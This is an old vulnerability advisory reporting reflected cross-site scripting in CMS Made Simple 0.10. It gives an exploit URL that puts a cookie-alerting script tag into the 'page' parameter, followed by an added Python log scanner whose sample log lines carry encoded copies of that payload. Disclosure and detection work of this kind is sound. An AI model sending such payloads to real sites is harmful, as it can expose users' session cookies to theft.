CMS Made Simple 0.10 is susceptible to a cross site scripting attack.

X1ngBox_at_securityfocus.com
Date: 09/26/05

    Date: 26 Sep 2005 08:38:05 -0000
    To: bugtraq@securityfocus.com
    
    
    [Description]: CMS lets you update your pages and keep the content on a static page that will not become stale regardless of how much other content gets placed on your site

    [version]:CMS Made Simple 0.10

    [vendor]:http://www.cmsmadesimple.org

    [Vulnerability]: cross site script

    [exploit]:
    http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
     
    .......[X1NG]..........
    X1ngBox <at/> Gmail Com
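
An added detection example, not part of the original post: it scans web-server access-log lines for requests to `index.php` whose `page` parameter decodes to HTML markup, as in the URL reported above. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Request line inside a combined-format access-log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters a page alias has no reason to contain but reflected markup needs.
MARKUP_RE = re.compile(r'[<>"\']')
MAX_DECODE_ROUNDS = 3  # unwrap nested percent-encoding without looping forever

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Sep/2005:08:40:00 +0000] "GET /cms/index.php?page=about-us HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Sep/2005:08:41:10 +0000] "GET /cms/index.php?page=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E HTTP/1.1" 200 4811',
    '203.0.113.9 - - [26/Sep/2005:08:41:30 +0000] "GET /cms/index.php?page=%253Cscript%253Ealert(document.cookie)%253B%253C/script%253E HTTP/1.1" 200 4811',
    '203.0.113.7 - - [26/Sep/2005:08:42:00 +0000] "GET /cms/other.php?page=%3Cb%3E HTTP/1.1" 404 210',
]


def fully_decode(value: str) -> str:
    """Percent-decode repeatedly until stable or the round limit is reached."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_page_values(log_lines):
    """Return (line_number, decoded_value) for index.php requests whose
    'page' parameter contains HTML metacharacters after decoding."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/index.php"):
            continue
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            if name == "page":
                value = fully_decode(raw)  # parse_qsl already decoded once
                if MARKUP_RE.search(value):
                    hits.append((lineno, value))
    return hits


if __name__ == "__main__":
    for lineno, value in suspicious_page_values(SAMPLE_LOG):
        print(f"line {lineno}: page={value!r}")
```

A hit only shows that markup was sent in `page`; whether it was reflected unencoded still has to be confirmed against the response or the installed version.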

